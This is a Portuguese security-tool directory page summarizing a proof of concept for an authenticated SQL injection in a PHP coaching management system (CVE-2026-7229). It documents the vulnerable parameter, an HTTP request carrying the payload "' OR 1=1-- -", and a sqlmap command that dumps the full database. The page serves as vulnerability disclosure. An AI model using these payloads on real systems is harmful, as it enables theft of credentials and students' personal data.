Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/xmyronn/cve-2026-7229-sqli
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de PenetraçãoSegurança de Banco de Dados
GitHubxmyronn/cve-2026-7229-sqli

CVE-2026-7229-SQLI

Prova de conceito para injeção SQL autenticada no Coaching Management System, demonstrando dump do banco de dados por meio do parâmetro não sanitizado complaintreply.

Ver Repositório
há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Injeção SQL Autenticada no Sistema de Gestão de Coaching Permite Extração Completa do Banco de Dados

Descrição

Existe uma vulnerabilidade de Injeção SQL no Sistema de Gestão de Coaching em PHP. O parâmetro complaintreply na funcionalidade de resposta do administrador não é devidamente sanitizado antes de ser utilizado em consultas SQL. Um atacante autenticado (Administrador) pode injetar consultas SQL maliciosas, levando à extração completa do banco de dados.


Detalhes da Vulnerabilidade

  • Tipo: Injeção SQL (CWE-89: Neutralização Incorreta de Elementos Especiais usados em um Comando SQL)
  • Impacto: Extração do Banco de Dados / Divulgação de Credenciais
  • Arquivo Afetado: /cims/modules/admin/reply.php
  • Parâmetro Afetado: complaintreply
  • Vetor de Ataque: Remoto, Autenticado (Administrador)
  • Banco de Dados: MySQL (MariaDB)

Fornecedor

code-projects.org


Produto

Sistema de Gestão de Coaching em PHP https://code-projects.org/coaching-management-system-in-php-with-source-code/


Versão

Desconhecida (Testado na versão mais recente disponível em abril de 2026)


Prova de Conceito (Resumo)

  1. O aluno submete uma reclamação Screenshot 2026-04-10 225755

  2. O administrador abre a reclamação e acede à funcionalidade de resposta

POST /cims/modules/admin/reply.php?complaintid=18 HTTP/1.1 Host: 192.168.0.9 Content-Type: application/x-www-form-urlencoded

complaintreply=' OR 1=1-- -&submit=submit

Screenshot 2026-04-10 225808
  1. Intercetar o pedido via Burp Suite Screenshot 2026-04-10 225821

  2. Injetar o payload:

    root@kitploit:~
    '
    
Screenshot 2026-04-10 225844
root@kitploit:~
Erro SQL observado

7. Confirmar a injeção:

root@kitploit:~
' OR 1=1-- -
Screenshot 2026-04-10 225900
  1. Extrair o banco de dados usando:

    root@kitploit:~
    sqlmap -r sqli.txt --dump
    
Screenshot 2026-04-10 235219

Injeção confirmada via baseada em erros, baseada em booleanos e exploração automatizada usando sqlmap

Impacto

  • Extração completa do banco de dados possível
  • Credenciais armazenadas em texto simples expostas
  • Comprometimento total dos dados da aplicação
  • Bypass de autenticação e escalonamento de privilégios via extração de credenciais
  • Extração completa do banco de dados alcançada, incluindo a tabela de utilizadores (credenciais), dados pessoais dos alunos, registos de professores e histórico de reclamações.

Gravidade: CRÍTICA

Baixar ferramenta